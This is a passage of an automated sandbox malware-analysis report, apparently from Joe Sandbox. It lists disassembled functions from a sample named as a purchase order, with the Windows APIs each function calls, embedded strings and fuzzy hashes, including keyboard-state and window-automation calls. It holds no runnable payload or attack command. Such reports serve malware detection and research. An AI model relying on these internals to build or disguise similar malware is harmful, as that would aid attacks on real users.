                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3969911579-0
                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                            Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                            • String ID: 0
                                                            • API String ID: 956284711-4108050209
                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                            Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 1965227024-3771769585
                                                            • Opcode ID: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                            • Opcode Fuzzy Hash: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                            Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove_wcslen
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 369157077-1007645807
                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                            Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00445BF8
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 3125838495-3381328864
                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                            Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                            Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 3052893215-2127371420
                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                            Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-2354261254
                                                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                            Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 3038501623-2263619337
                                                            • Opcode ID: 42e64448fb0921aa5bc042f3a22c06f2a5717f1c2cd6c32af37c77127d07761a
                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                            • Opcode Fuzzy Hash: 42e64448fb0921aa5bc042f3a22c06f2a5717f1c2cd6c32af37c77127d07761a
                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                            Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-8599901
                                                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                            Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00443B67
                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                            • IsWindow.USER32(00000000), ref: 00443C3A
                                                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1834419854-3405671355
                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                            Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • _wprintf.LIBCMT ref: 00454074
                                                            • __swprintf.LIBCMT ref: 004540A3
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 455036304-4153970271
                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                            Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                            • _memmove.LIBCMT ref: 00467EB8
                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                            • _memmove.LIBCMT ref: 00467F6C
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                            • String ID:
                                                            • API String ID: 2170234536-0
                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                            Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                            • GetKeyState.USER32(00000012), ref: 00453E26
